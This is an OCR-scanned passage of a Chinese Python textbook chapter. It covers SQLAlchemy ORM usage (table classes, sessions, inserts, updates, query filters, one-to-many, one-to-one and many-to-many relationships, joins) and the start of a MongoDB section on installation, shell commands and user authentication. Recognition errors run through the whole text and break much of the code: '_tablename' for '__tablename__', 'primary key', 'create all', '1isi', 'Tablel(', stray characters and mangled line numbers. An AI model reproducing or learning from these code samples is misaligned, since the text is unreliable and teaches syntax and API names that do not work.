有 了 声明 的 基 类 实例 ,就 可 以 定义 任意 需要 的 映射 到 表 的 类 ,如 Student 表 。 


>>> from sqlalchemy import Column, Integer, String 
>>> class Student (Base): 

_tablename = 'student" 

id= Column( Integer, primary key = True) 

name = Column( String(8), unique = True) 

sex = Column(String(4),default = ' 男 ') 

age = Column(Integer) 

address = Column(String(40), default = "'') 


类 中 最 少 需 要 一 个 _tablename_ 属 性 ,用 于 定义 表 名 ,一 个 作为 主键 的 列 。 
根据 定义 的 类 ,通过 声明 系统 就 生成 了 该 表 的 元 数据 , 它 是 SQLAlchemy 描述 这 张 表 
的 依据 。 可 以 通过 “类 名 . _table “来 查看 。 如 : 


>>> Student. _ table 
接 下 来 就 应 该 是 创建 表 了 ,执行 基 类 实例 的 create_all() 方 法 创建 表 ， 


>>> Base. metadata. create all(engine) 
3. 创建 会 话 


>>> from sqlalchemy. orm import sessionmaker 
>>> Session = sessionmaker(bind = engine) 


>>> session = Session() 


4. 插入 数据 

首先 创建 定义 类 的 实例 。 

>>> zhangsan = Student(id=1, name= ' 张 三 '，sex = ' 男 ',age = 19, address = ' 沈 阳 市 ') 
调用 session 的 add() 方 法 添加 数据 。 

>>> session.add(zhangsan) 

最 后 必须 执行 commit() 方 法 提交 事务 ,数据 库 才 会 执行 。 


>>> session. commit() 


5. 更 新 数据 
这 样 “ 张 三 ”这 条 记录 就 插入 表 中 ,如 果 数 据 有 些 错误 需要 修改 ,怎么 做 呢 ? 看 下 面 的 
代码 : 


>>> zhangsan. address = ' 北 京 市 ' 
>>> session. commit() 
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直接 修改 zhangsan 对 象 的 属性 ,然后 提交 事务 就 可 以 了 。 
6. 删除 数据 
再 创建 对 象 李 四 。 


>>> lisi = Student(id= 2，name= ' 李 四 '，sex= ' 女 ', age= 18,address= ' 大 连 市 ') 
>>> session.add(1isi) 


>>> session. commit() 
然后 删除 它 。 


>>> session. delete(lisi) 


>>> session. commit() 


7. 查询 数据 
用 session 的 query() 函 数 创建 一 个 Query 对 象 ,该 函数 需要 一 些 描述 类 的 参数 ,下 面 
构造 一 个 Student 类 实例 的 查询 ,然后 通过 迭代 器 返回 Student 对 象 列表 。 


>>> for instance in session. query(Student). order by(Student. id): 


print( instance. name, instance. age, instance. address) 


张 三 19 北京 市 


又 如 : 


>>> for name, age in session. query(Student. name, Student. age) : 


print(name,age) 


张 三 19 


1) 条 件 查询 
SQLAlchemy 常用 的 查询 过 滤器 如 表 9-4 所 示 。 


表 9-4 SQLAIchemy 常用 的 查询 过 滤器 























过 滤器 说 明 

filter() 把 过 滤器 添加 到 原 查 询 上 ,返回 一 个 新 查询 

filter_by() 把 等 值 过 滤器 添加 到 原 查 询 上 ,返回 一 个 新 查询 

limit() 使 用 指定 的 值 限制 原 查 询 返 回 的 结果 数量 ,返回 一 个 新 查询 

offset() 偏 移 原 查询 返回 的 结果 ,返回 一 个 新 查询 

order_by() 根据 指定 条 件 对 原 查 询 结 果 进 行 排序 ,返回 一 个 新 查询 

group_by() 根据 指定 条 件 对 原 查询 结果 进行 分 组 ,返回 一 个 新 查询 
查询 过 滤器 应 用 举例 : 


>>> for name in session. query(Student.name).filter_ by(address = ' 北 京 市 ') : 


print(name) 
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人 三) 

>>> for name in session. query(Student. name). filter(Student. address == ' 北 京 市 '): 
print (name) 

(ke 

常用 的 查询 过 滤器 如 下 。 

9 等 于 : 

query. filter(Student. name == ' 张 三 ') 

9 不 等 于 : 

query. filter(Student. name != ' 张 三 ') 

2 LIKE: 

query. filter(Student. name. like('% 张 %')) 

2 IN: 

query. filter(Student.name. in_([' 张 三 '，' 李 四 ',' 王 五 '])) 

2 NOT IN: 

query.filter( 一 Student.name. in_([' 张 三 '，' 李 四 '，' 王 五 '])) 

9 IS NULL 空 集 : 

query. filter(Student. name == None) 

2 IS NOT NULL 非 空 : 

query. filter(Student. name != None) 

2 AND 与 运算 : 


from sqlalchemy import and_ 
query. filter(and_(Student. name == ' 张 三 ', Student.address == ' 北 京 市 ')) 


9 OR 或 运算 : 


from sqlalchemy import or_ 
query. filter(or (Student.name == ' 张 三 '， Student.name == ' 李 四 ')) 


2 MATCH: 
query. filter(Student. name. match( ' 三 ')) 
2 distinct() 去 重 : 


session. query(Student. sname). distinct() 


9 label() 加 标签 : 
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query = session. query(Student. sname. label( ' 姓 名 ')) 


2) 返回 列表 和 标量 
在 查询 上 应 用 指定 的 过 滤器 后 ,通过 调用 查询 函数 执行 查询 ,以 列表 的 形式 返回 结果 。 
SQLAlchemy 常用 的 查询 执行 函数 如 表 9-5 所 示 。 


方 


表 9-5 SQLAIchemy 常用 的 查询 执行 函数 


法 说 明 





all() 


以 列表 形式 返回 查询 的 所 有 结果 





first() 


返回 查询 的 第 一 个 结果 ,如 果 没 有 结果 , 则 返回 None 





first_or_404() 返回 查询 的 第 一 个 结果 ,如 果 没 有 结果 , 则 终止 请 求 ,返回 404 错误 响应 





get() 


返回 指定 主键 对 应 的 行 ,如 果 没 有 对 应 的 行 , 则 返回 None 





get_or_404() 返回 指定 主键 对 应 的 行 ,如 果 没 找到 指定 的 主键 , 则 终止 请 求 ,返回 404 错误 响应 











count() 返回 查询 结果 的 数量 
paginate() 返回 一 个 Paginate 对 象 , 它 包含 指定 范围 内 的 结果 
© all() 


>>> query = session.query(Student). filter(Student. name. like('% 三 ')).order by(Student. id) 
>>> query.all() 


© first() 


>>> query. first() 


2 one() 


Stul 


= query. one() 


2 count() 


>>> session. query(Student). filter(Student. name. like('% 三 ')).count() 


. 


8. 通过 SQLAIchemy 操作 MySOL 

以 上 的 代码 是 以 SQLite 数据 库 为 例 的 , 下面 以 MySQL 数据 库 为 例 ,说 明 
SQLAlchemy 的 用 法 。 通 过 SQLAlchemy 模板 操作 MySQL 数据 库 ,最 关键 的 步骤 是 连接 
字符 串 的 配置 ,具体 代码 如 下 。 

例 [ch9 6_1SQLAlchem. py】 


oo 


间 一 * 一 coding:utf-8 一 * 一 


from sqlalchemy import create engine 

from sqlalchemy. orm import sessionmaker 

from sqlalchemy import Column 

from sqlalchemy. types import Integer, String 

from sqlalchemy. ext. declarative import declarative base 


DB_CONNECT_ STRING = 'mysql + pymysql://root:123456(@192.168.1.103/test?charset = utf8" 


. engine = create engine(DB CONNECT STRING, echo= True) 
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11. DB Session = sessionmaker(bind = engine) 
12. session = DB Session() 


14. Base = declarative base() 
15. def init db(): 


16. Base. metadata. create all(engine) 

by 

18. def drop db(): 

19. Base. metadata. drop all(engine) 

20. 

21. class Student(Base): 

22, _tablename = 'student' 

23， id = Column( Integer, primary key = True) 
24. name = Column(String(64),unique = True) 
256 sex = Column(String(4),default = ' 男 ') 
26. age = Column(Integer) 

FE 局 address = Column(String(40),default = '') 
28. 

29. init_db() 

30. #drop_db() 

3 


32，zhangsan = Student(id=1, name= ' 张 三 '，sex = ' 男 ',age = 19, address = ' 沈 阳 市 ') 
33. 1lisi = Student(id= 2，name = ' 李 四 '，sex= ' 女 ', age= 18,address = ' 大 连 市 ') 

34. session.add(zhangsan) 

35. session.add(1lisi) 

36. session.commit() 

37. session.close() 


《全 说明: 第 9 行 ,DB_CONNECT_STRING 就 是 连接 数据 库 的 路 径 。mysql 十 
pymysql 指定 了 使 用 PyMySQL 来 连接 MySQL; root 和 123456 分 别 是 用 户 名 与 密码 ; 
192. 168. 1. 103 是 数据 库 服务 器 的 IP; test 是 使 用 的 数据 库 名 (可 省 略 ); charset 指定 了 连 
接 时 使 用 的 字符 集 ( 可 省 略 ) 。 

第 10 行 ,返回 数据 库 引 擎 。 

第 11 行 ,返回 一 个 数据 库 会 话 类 。 

第 14 行 ,创建 了 一 个 Base 类 ,这 个 类 的 子 类 可 以 自动 与 一 张 表 关 联 。 

第 15 行 , 创 建 数据 表 。 

第 18 行 ,删除 数据 表 。 

第 21 一 27 行 , 创 建 一 个 Student 类 ,包含 id.name、sex、age、address 属性 。 

第 29 行 , 创 建 Student 表 。 

第 32 行 .第 33 行 ,创建 两 个 Student 对 象 。 

第 34 行 .第 35 行 ,将 对 象 插入 会 话 。 

第 36 行 ,提交 数据 。 

第 37 行 ,关闭 连接 。 


9.6.2 关系 
关系 型 数据 库 中 使 用 表 和 表 间 的 参照 关系 来 表示 实体 之 间 的 关系 ,关系 有 一 对 一 关系 、 
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一 对 多 关系 和 多 对 多 关系 。 那 么 在 SQLAlchemy 中 关系 是 如 何 表示 的 呢 ? 
SQLAlchemy 模块 中 定义 了 ForeignKey 来 处 理 表 间 的 关系 ,首先 导入 该 类 : 


>>> from sqlalchemy import ForeignKey 

SQLAlchemy 中 类 之 间 的 关系 是 通过 relationship() 方 法 来 描述 的 ,首先 导入 该 方法 : 

>>> from sqlalchemy. orm import relationship 

下 面 通过 Student 表 与 Book 表 来 说 明 事物 间 的 关系 ,每 本 书 唯一 地 属于 一 个 学 生 , 一 
个 学 生 可 以 有 多 本 书 。 下 面 就 来 看 这 种 关系 在 SQLAlchemy 中 是 如 何 定义 的 。 

1. 一 对 多 关系 


一 对 多 关系 中 ,在 子 表 端 放置 foreign key 参考 父 表 ,relationship() 方 法 被 放 在 父 表 用 
于 收集 子 表 中 的 与 主 表 相关 联 的 列表 。 
例 [ch9 6 2_ltomulti. py】 


1 class Student (Base): 

本 _ tablename = 'students' 

3 id = Column( Integer, primary_key = True) 

4 name = Column( String(8), unique = True) 

- idlist = relationship("Book") 

6 

7. class Book(Base): 

8 _ tablename = 'books’ 

9 bk_id = Column(Integer, primary key= True) 
10. bookname = Column(String, nullable= False) 
1 owner_id = Column(Integer, ForeignKey("student. id")) 


人 人 说明 : 第 5 行 ,调用 relationship("Book") 指 定 Student 类 与 Book 类 有 参照 关系 ， 


这 里 的 Book 是 “多 方 ” 的 类 名 。idlist 属性 将 返回 与 Student 相关 联 的 Book 组 成 的 列表 。 
第 11 行 ,用 ForeignKey() 指 定 books 表 的 owner_id 参照 students 表 的 id 列 。 
建立 一 对 多 双向 关系 (就 是 反 转 的 多 对 一 ) ,需要 一 个 额外 的 relationship() 方 法 连接 到 
多 方 ,函数 使 用 时 需要 用 到 relationship. back_populates 参数 。 


1. class Student(Base): 

名 _tablename = 'students'" 

3 id = Column( Integer, primary key = True) 

4 name = Column( String(8), unique = True) 

号 idlist = relationship("Book", back populates = "student") 
6 

3 

8 

9 


class Book( Base): 
_tablename ”= 'books’ 
bk_id = Column(Integer,primary key= True) 
10. bookname = Column(String, nullable= False) 
11, owner_id = Column(Integer, ForeignKey("students. id")) 
12, student = relationship("Student", back populates= "idlist") 


{可 说 明 : 第 5 行 ,指定 Book 类 与 本 类 (Student 类 ) 相 关 ,relationship() 方 法 中 的 





back_populates 参数 向 Student 模型 中 添加 一 个 idlist 属性 ,从 而 定义 反 向 关系 。 这 一 属性 
可 替代 Student. id 访问 Student 模型 ,此 时 获取 的 是 模型 对 象 ,而 不 是 外 键 的 值 。 
第 11 行 ,指定 books 表 的 owner_id 参照 students 表 的 id 列 。 
第 12 行 ,指定 Student 类 与 本 类 相关 ,relationship() 方 法 给 Book 模型 添加 了 一 个 
student 属性 ,与 第 5 行 中 的 idlist 属性 一 样 , 它 获 取 的 是 模型 对 象 ,而 不 是 外 键 的 值 。 
例 [ch9 6 2_ ltom. py】 
井 -*# 一 coding:utf-8 一 * 一 
from sqlalchemy import create engine 


from sqlalchemy. ext. declarative import declarative base 
from sqlalchemy import Column, Integer, String, Float 


i 
2 
沪 
4 
5. from sqlalchemy. orm import sessionmaker 
6. from sqlalchemy import ForeignKey 

7. from sqlalchemy. orm import relationship 

8 

9. engine = create engine('sqlite:///:memory:', echo= True) 


10. Base = declarative base() # 创 建 基 类 实例 


区 

12. class Student(Base): 

Es _tablename = 'students’ 

14. id = Column( Integer, primary key = True) 

5， name = Column( String(8), unique = True) 

16. sex = Column(String(4),default = ' 男 ') 

Ey age = Column(Integer) 

18. address = Column(String(40), default = "') 

19. idlist = relationship("Book", back populates = "student") 
20. 

21. class Book(Base): 

22. _ tablename ”= "books' 

23; bk_id = Column(Integer,primary key= True) 

24. bookname = Column(String, nullable= False) 

是 price = Column(Float，default=0.0) 

26. owner_id = Column(Integer, ForeignKey("students. id")) 
2 student = relationship("Student", back populates = "idlist") 
28. 

29. Base. metadata. create all(engine) 

30. 


31. Session = sessionmaker(bind= engine) 
32. session = Session() 


34. zhangsan = Student(id= 1，name = ' 张 三 ', sex= ' 男 ',age = 19, address = ' 沈 阳 市 ') 
35. session.add(zhangsan) 

36. lisi = Student(id=2, name= ' 李 四 '，sex= ' 女 ', age = 18,address = ' 大 连 市 ') 

37. session.add(1isi) 

38. session.commit() 


40. zsbkl = Book(bk id= 1，bookname = ' 平 凡 的 世界 ', price = 23.5, owner id=1) 
41. zsbk2 = Book(bk_id= 2，bookname = ' 世 界 简 史 ', price = 12.6, owner_id=1) 
42. session.add(zsbk1) 
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43. session.add(zsbk2) 

44. lsbkl = Book(bk_id= 3，bookname = ' 爱 的 罗曼 史 '，price = 5.20，owner_id= 2) 

45. lsbk2 = Book(bk_id = 4，bookname = 'Python 编程 教程 ', price = 56.90, owner_id=2) 
46. session.add(1sbkl) 

47. session.add(1sbk2) 


48. session.commit() 


50. for instance in session. query(Student).order by(Student. id) : 


SE print( instance. name, instance. age, instance. address) 

52. 

53. for instance in session. query(Book).order by(Book. bk_id): 

54. print( instance.bk_id，instance. bookname, instance. price, instance. owner_id) 


(说明: 第 19 行 ,使 用 relationship() 方 法 为 Student 类 添加 了 一 个 idlist 属性 , 它 返 
回 的 是 模型 的 对 象 。 
第 26 行 ,ForeignKey("student. id") 说 明 owner_id 列 参 照 Student 表 的 id 列 。 
第 27 行 与 第 19 行 的 作用 一 样 ,在 类 的 级 别 给 Book 类 添加 了 关联 的 类 。 
2. 一 对 一 关系 
一 对 一 关系 类 型 是 简化 版 的 一 对 多 关系 ,限制 “多 ”这 一 侧 最 多 只 能 有 一 个 记录 。 一 对 
一 关系 实质 上 是 两 边 都 有 标量 属性 的 双边 关系 ,在 关系 的 “一 端 ? 调 用 relationship() 方 法 时 
要 把 uselist 设 为 False, 即 可 将 一 对 多 关系 转换 成 一 对 一 关系 。 
例 [ch9 6 2_ ltol.py】 
class Student(Base) : 
_ tablename = 'students’' 
id = Column( Integer, primary key = True) 


1 
2 
3 
4 name = Column( String(8), unique = True) 

上 二 idlist = relationship("Book", uselist = False, back populates = "student") 
6 

7 

8 

9 


class Book( Base): 
_tablename = "books' 
bk _id = Column(Integer, primary key= True) 
10. bookname = Column(String，nullable = False) 
LL owner_id = Column(Integer, ForeignKey("students. id")) 
LE student = relationship("Student", back populates = "idlist") 


(可 说 明 : 第 5 行 ,在 关系 的 “一 端 ?调用 relationship() 方 法 时 ,把 uselist 设 为 False， 
也 就 是 在 关联 两 个 模型 时 用 标量 而 不 是 列表 。 这 样 把 一 对 多 关系 转换 成 一 对 一 关系 。 

3. 多 对 多 关系 

一 对 多 关系 和 一 对 一 关系 至 少 都 有 一 侧 是 单个 实体 ,所 以 记录 之 间 的 联系 通过 外 键 实 
现 , 让 外 键 指向 这 个 实体 。 而 多 对 多 关系 是 关系 数据 库 中 最 为 复杂 的 一 种 关系 ,最 典型 的 多 
对 多 关系 就 是 学 生 与 课程 的 关系 。 一 方面 一 个 学 生 可 以 选修 多 门 课程 ; 另 一 方面 一 门 课 可 
以 被 多 个 学 生 选 修 ,那么 ,多 对 多 关系 在 SQLAlchemy 中 是 如 何 表示 的 呢 ? 

要 表示 多 对 多 关系 ,需要 引入 第 三 张 表 association ,该 表 有 两 个 列 s id 和 c_id,s_id 参 
照 students 表 中 的 s_id,c_id 列 参 照 courses 表 中 的 c_id 列 , 这 样 ,students 与 association_ 


table 表 是 一 对 多 关系 ,courses 与 association_table 表 也 变 成 了 一 对 多 关系 。 它 们 的 关系 如 
图 9-1 所 示 。 


association 


students 











图 9-1 多 对 多 关系 的 转换 


多 对 多 关系 定义 及 处 理 代码 如 下 。 
例 [ch9 6 2_m2m.py】 


1. 提 一 * 一 coding:utf-8 一 x* 一 

2. from sqlalchemy import create engine 

3. from sqlalchemy. ext.declarative import declarative base 
4. from sqlalchemy import Column, Integer, String, Float, Table 
5. from sqlalchemy.orm import sessionmaker 

6. from sqlalchemy import ForeignKey 

7, from sqlalchemy. orm import relationship 

8. 

9. engine = create engine('sqlite:///:memory:', echo= True) 
10. Base = declarative base() # 创 建 基 类 实例 

12. association = Tablel( 'association', Base. metadata, 

13. Column('s_id', Integer, ForeignKey('students.s_id')), 
14. Column('c_id', Integer, ForeignKey('courses.c id')) 
15, ) 

16. 

17. class Student(Base): 

18. _tablename = 'students' 

19, s_id= Column( Integer, primary key= True) 

20. sname = Column( String(8), unique = True) 

4 网 course = relationship("Course", secondary = association, back populates = "student") 
22: 

23. class Course(Base) : 

24. _tablename = "courses' 

好 c_id = Column(Integer, primary key= True) 

26. cname = Column(String，nullable = False) 

7 student = relationship ( " Student", secondary = association, back_populates =" 
course") 

28. 

29. Base.metadata. create all(engine) 

30. 

31. Session = sessionmaker(bind= engine) 

32. session = Session() 

3 

34. zhangsan = Student(s_id= 1，sname= ' 张 三 ') 

35. session.add(zhangsan) 

36. lisi = Student(s_id=2, sname= ' 李 四 ') 

37. session.add(1isi) 


39. shuxue = Course(c_id=1，cname= ' 数 学 ') 
40. session.add(shuxue) 
41. wuli = Course(c_id= 2，cname= ' 物 理 ') 


42. session.add(wuli) 


44， 并 现在 张 三 选 修了 物理 、 数 学 
45. zhangsan. course.append(wuli) 
46. zhangsan. course. append( shuxue) 
47， 井 李 四 选 修了 数学 

48. 1lisi. course.append(shuxue) 
49. session. commit() 

50，# 查 询 " 张 三 "选修 的 课程 

51. recordset = zhangsan. course 
52. for row in recordset: 

EF. 大 网 print( row. cname) 

54.# 查 询 选修 了 数学 的 学 生 姓名 
55. studentset = shuxue. student 
56. for row in studentset: 


57: print(row. sname) 
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(村 说 明 : 多 对 多 关系 仍 使 用 定义 一 对 多 关系 的 relationship() 方 法 进行 定义 ,但 在 多 
对 多 关系 中 ,必须 把 secondary 参数 设 为 关联 表 。 多 对 多 关系 可 以 在 任何 一 个 类 中 定义 ， 
back_populates 参数 会 处 理 好 关系 的 另 一 侧 。 关 联 表 就 是 一 张 简单 的 表 , 不 是 模型 ， 


SQLAlchemy 会 自动 接管 这 张 表 。 


course 关系 使 用 列表 语义 ,这 样 处 理 多 对 多 关系 特别 简单 。 假 设 学 生 是 s, 课 程 是 c, 学 


生 s 选修 课程 c 的 代码 为 
>>> s. course.append(c) 
列 出 学 生 s 选修 的 课程 以 及 选修 了 课程 的 学 生 也 很 简单 : 


>>> s. course.all() 
>>> c. student.all() 


Course 模型 中 的 student 关系 由 参数 back_populates 定义 。 如 果 后 来 学 生 s 决定 不 选 


修 课程 c 了 ,那么 可 使 用 下 面 的 代码 更 新 数据 库 : 


>>> s. course. remove(c) 
>>> session. commit() 


第 51 一 53 行 的 作用 与 下 面 代码 的 功能 相似 : 


recordset = session. query(Course. cname). join(association).\ 
join(Course). filter(Student. sname == ' 李 四 ' ).all() 

for row in recordset : 
print(row. cname) 


4. 多 表 关 联 查 询 


定义 了 多 张 表 之 间 的 关系 后 ,最 常用 的 就 是 多 表 关联 查询 了 ,在 SQLAlchemy 中 有 两 
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种 关联 方法 : 内 连接 (join) 和 左 连接 (outerjoin) ,内 连接 是 两 表 中 关联 字段 值 相等 , 左 表 与 
右 表 均 有 相应 的 记录 时 ,可 以 查询 出 结果 ; 左 连接 以 左 表 为 基础 ,查询 右 表 , 若 右 表 没有 相 
应 的 值 , 则 以 None 补充 。 

下 面 还 以 上 文中 设计 的 students 表 、books 表 courses 表 为 例 , 介 绍 SQLAlchemy 中 多 
表 关 联 查 询 的 方法 。 

1) 简单 连接 查询 

针对 session 执行 query ,使 用 join 执行 连接 ,如 : 


>>> query = session. query(Student. sname, Book. bookname). join(Book) 


通过 query. statement 属性 可 以 看 到 查询 对 应 的 SQL 语句 ,语句 如 下 : 





>>> print (query. statement) 

SELECT students. sname, books. bookname 

FROM students JOIN books ON students. id = books.owner id 

>>> rows = query.all() 

>>> print([row for row in rows]) 

[( 张 三 "平凡 的 世界 "'，23. 5)，( " 张 三 "，' 世 界 简 史 '，12.6)，( ' 李 四 "，' 爱 的 罗曼 史 '，5.2)，( ' 李 四 '， 

'Python 编程 教程 '， 56.9)] 

query 返回 的 是 一 个 Query 对 象 ,query. all() 方 法 返回 的 是 一 个 列表 ,可 以 使 用 列表 的 
方法 来 处 理 数 据 。 输 出 查询 结果 也 可 以 使 用 下 面 的 语句 实现 : 


for row in rows: 
print(row, sep= ", ') 


也 可 以 使 用 下 面 的 代码 获取 查询 结果 : 


for row in rows: 
for i in range(len(row) ) : 
item = row[i] 
2) 根据 条 件 的 查询 
通过 filter() 方 法 设置 过 滤 参 数 : 
>>> query = session. query(Student. sname，Book. bookname) . join(Book). filter(Student. sname == 
' 张 三 ') 
查询 的 语句 相当 于 : 
SELECT students. sname，books. bookname 
EROM students JOIN books ON students. id = books.owner id 
WHERE students. sname = :sname 1 
3) 对 查询 结果 进行 排序 
通过 order_by() 方 法 设置 过 滤 参 数 : 


>>> query = session. query(Student. sname, Book. bookname) . join(Book). filter(Student. sname ==" 
张 三 ').order_by(Student. id) 


查询 的 语句 相当 于 : 
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SELECT students. sname，books. bookname 

FROM students JOIN books ON students. id = books.owner id 

WHERE students. sname = :sname 1 ORDER BY students. id 

4) 对 查询 结果 进行 分 组 

通过 group_by() 函数 对 查询 结果 进行 分 组 .还 可 以 用 having() 方 法 对 分 组 附加 条 件 ， 
having() 方 法 中 可 能 需要 运算 函数 ,如 count() .sum() row_number() ,在 使 用 运算 函数 之 
前 ,使 用 from sqlalchemy import func 导入 Func 模块 。 


query = session. query(Student. sname, Book. bookname). join( Book ). group_by( Student. id ). 
having( func.count( Book. bk id )>1) 


查询 的 语句 相当 于 : 


SELECT students. sname, books. bookname 
FROM students JOIN books ON students. id = books.owner_ id GROUP BY students. id 
HAVING count (books. bk_id) > :count 1 


又 如 : 


query = session. query(Student. sname, Book. bookname ). join( Book ). group_by( Student. id ). 
having( func. sum( Book. price )> 30) 


查询 的 语句 相当 于 : 


SELECT students. sname，books, bookname 
FROM students JOIN books ON students, id = books.owner id GROUP BY students. id 
HAVING sum(books. price) > :sum 1 


9.7 操作 MongoDB 数据 库 


以 上 介绍 了 Python 操作 关系 型 数据 库 。 随 着 互联 网 的 发 展 , 数 据 越 来 越 多 ,数据 结构 
越 来 越 复杂 ,传统 的 关系 型 数据 库 对 于 高 并 发 读 / 写 ,海量 数据 的 高 效率 存储 和 访问 ,高 可 扩 
展 性 和 高 可 用 性 等 需求 感到 有 些 力不从心 ,于 是 产生 了 非 关 系 型 数据 库 , 即 NoSQL (Not 
Only SQL)。 非 关系 型 数据 库 具有 以 下 特点 。 

(1) 易 扩展 。 

(2) 大 数据 量 ,高 性 能 。 

(3) 灵活 的 数据 模型 。 

(4) 高 可 用 。 

NoSQL 也 有 缺点 ,到 目前 为 止 ,NoSQL 都 没有 正式 的 官方 支持 ,万 一 出 了 差错 后 果 将 
非常 严重 ; 再 者 NoSQL 并 未 形成 统一 的 标准 ,各 种 产品 层出不穷 ,内 部 混乱 ,这些 产品 还 需 
要 时 间 的 检验 。 

MongoDB 是 一 个 介 于 关系 型 数据 库 和 非 关 系 型 数据 库 之 间 的 产品 ,是 非 关 系 型 数据 
库 当 中 功能 最 丰富 、 最 像 关系 数据 库 的 。 它 支持 的 数据 结构 非常 松散 ,是 类 似 json 的 bjson 
格式 ,因此 可 以 存储 比较 复杂 的 数据 类 型 。MongoDB 最 大 的 特点 是 , 它 支持 的 查询 语言 非 
常 强大 ,其 语法 有 点 类 似 于 面向 对 象 的 查询 语言 ,几乎 可 以 实现 类 似 关系 型 数据 库 单 表 查 询 
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的 绝 大 部 分 功能 ,而 且 还 支持 对 数据 建立 索引 。 它 的 特点 是 高 性 能 、 易 部 署 、 易 使 用 ,存储 数 
据 非 常 方便 。 
MongoDB 采用 键 / 值 对 的 存储 方式 ,这 样 提 供 了 高 性 能 和 高 伸缩 性 。MongoDB 服务 
器 端 可 运行 在 Linux、Windows 或 OS X 平 台 , 支 持 32 位 和 64 位 应 用 ,默认 端口 为 27017。 
MongoDB 支持 多 种 编程 语言 ,其 中 包括 Python, 有 人 称 Python 与 MongoDB 就 是 天 生 的 
一 对 。 


9.7.1 MongoDB 的 安装 与 使 用 


1. Windows 下 安装 MongoDB 

从 https://www. mongodb. org/downloads 选择 将 要 下 载 的 版 本 ,因为 开发 平台 
64 位 Windows 7, 所 以 这 里 的 版 本 选择 Windows 64-bit 2008R 十 ,下 载 的 文件 为 mongodb- 
win32-x86_64-2008plus-ssl-3. 2. 6-signed. msi, 双击 安装 ,新 建 数据 库 保存 路 径 , 如 D:\ 
mongodb, 在 其 下 新 建 db 文件 夹 和 log 文件 夹 。 

将 “我 的 电脑 ”切换 到 C:\Program Files\MongoDB\Server\3. 2\bin 文件 夹 , 按 住 Shift 
键 , 右 击 窗口 空白 处 ,在 弹出 的 菜单 中 选择 “在 此 处 打开 命令 窗口 "命令 ,在 打开 的 命令 窗口 
中 ,执行 以 下 命令 启动 服务 器 。 

> mongod. exe —- dbpath D:\MongoDB\db —— logpath D:\MongoDB\1log\MongoDB. log 

同样 方式 ,执行 mongo. exe, 打 开 MongoDB 的 Shell, 即 它 的 客户 端 ,在 此 处 可 以 执行 
MongoDB 的 命令 ,操作 数据 库 。 

2. CentOS 6 下 安装 MongoDB 3.2.6 

1) 下 载 MongoDB 


[root@Cent0S67 ~ ]# wget https://fastdl. mongodb. org/linux/mongodb - linux — x86_64 - rhel62 
-3.2.6.tgz 


2) 解压 
[root@Cent0S67 ~ ]# tar zxvf mongodb - linux ~— x86 _64— rhel62— 3.2.6.tgz 
3) 创建 数据 及 日 志 目 录 


[root@Cent0S67 一 ] 井 mv mongodb - linux - x86_64 - rhe162 - 3.2.6 mongodb 
[root@Cent0S67 ~ ]# cd mongodb 

[root@Cent0S67 mongodb]# mkdir db 

[root@Cent0S67 mongodb]# mkdir logs 


4) 生成 配置 文件 


[root@Cent0S67 mongodb]# cd bin 
nano mongodb. conf 


内 容 为 


dbpath = /usr/local/mongodb/db 
logpath = /usr/local/mongodb/logs/mongodb. log 





第 9 章 “ 操作 数据 库 〔173) 


port = 27017 

fork = true 

nohttpinterface = true 

把 文件 夹 移动 到 /usr/1local 

[root@Cent0S67 ~ ]# mv mongodb /usr/local 


5) 开机 自动 启动 MongoDB 


nano /etc/rc.d/rc. local 
/usr/local/mongodb/bin/mongod -- config /usr/local/mongodb/bin/mongodb. conf 


6) 重启 一 下 系统 测试 能 不 能 自 启 


井 进入 MongoDB 的 Shell 模式 
/usr/local/mongodb/bin/mongo 
# 查 看 数据 库 列表 

show dbs 

# 当 前 db 版 本 


db. version(); 


3. MongoDB 常用 命令 

进入 MongoDB 安装 目录 ,执行 mongo 即 可 进入 客户 端 Shell。 常 用 命令 如 下 。 

9 show dbs: 显示 数据 库 列表 。 

show collections: 显示 当前 数据 库 中 的 集合 (类 似 关系 型 数据 库 中 的 表 )。 

show users: 显示 用 户 。 

use 二 db name 二 : 切换 当前 数据 库 , 这 和 MSSQL 里 面 的 意思 一 样 。 

db. help(): 显示 数据 库 操作 命令 ,里 面 有 很 多 的 命令 。 

db. dropDatabase() : 删除 当前 使 用 的 数据 库 。 

db. getName() : 获得 当前 数据 库 名 称 , 与 db 的 作用 是 一 样 的 。 

db. stats() : 显示 当前 db 状态 。 

db. getMongo() : 查看 当前 db 的 连接 机 器 地 址 。 

show collections: 得 到 当前 db 的 所 有 聚集 集合 ,其 实 还 有 一 个 命令 ,show tables 与 
它 的 作用 是 一 样 的 , 只 是 MongoDB 中 不 再 用 表 的 概念 ,所 以 还 是 用 show 
collections。 

用 户 相关 命令 。 

(1) 创建 Administrator 账号 。 


0 0 0 00000050 


use admin 
db. createUser( {user: "admin", pwd: "admin", roles: [{role: "root", db: "admin" }]}) 
MongoDB 在 V3.0 版 本 之 后 内 置 了 root 角色 ,也 就 是 结合 了 readWriteAnyDatabase、 
dbAdminAnyDatabase userAdminAnyDatabase、 clusterAdmin 4 个 角色 权限 ,类 似 于 
Oracle 的 sysdba 角色 ,但 MongoDB 的 超级 管理 员 用 户 名 称 是 可 以 随便 定义 的 。 
创建 test_database 数据 库 的 账号 。 


db. createUser( {user:"test", pwd:"123456", roles:[{role:"readWrite", db:"test database"}]}) 
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(2) 数据 库 认 证 安全 模式 。 
在 配置 文件 mongod. conf 中 加 入 认证 参数 ,使 MongoDB 进行 安全 认证 。 配 置 后 ,进入 
Shell, 不 认证 是 没有 show dbs 等 权限 的 ,只 有 认证 后 , 才 有 权限 。 


mongod. conf : 

dbpath = D:\MongoDB\db 

logpath= D:\MongoDB\log\MongoDB. 1og 
auth= true 


httpinterface = true 


重新 启动 mongod - config 二 mongod. conf, 执 行 下 面 的 认证 操作 。 


use admin 

show dbs # 此 时 会 出 错 ,因为 没 认 证 
db.auth("admin", "admin") 

show dbs 


(3) 显示 当前 所 有 用 户 。 
show users; 
(4) 删除 用 户 。 


db. dropUser("testuser") 


知识 拓展 : 在 MongoDB 3. x 版 本 中 启动 认证 功能 以 后 ,在 MongoDB 自己 的 客 


户 端 和 了 Python 3. x 中 认证 顺利 通过 ,没有 问题 ,但 是 若 启 用 了 MongoDB 的 Web 网 页 ,或 者 
第 三 方 客户 端 (如 RoboMongo、MongoVUE 和 MongoBooster) 就 不 能 顺利 通过 认证 了 。 原 
因 是 MongoDB 3.x 使 用 了 新 的 SCRAM-SHA-1 认证 方式 ,这 些 客户 端 还 不 能 很 好 支持 , 配 
置 方法 如 下 。 

(1) 首先 关闭 认证 ,也 就 是 不 带 --auth 参数 ,启动 MongoDB。 

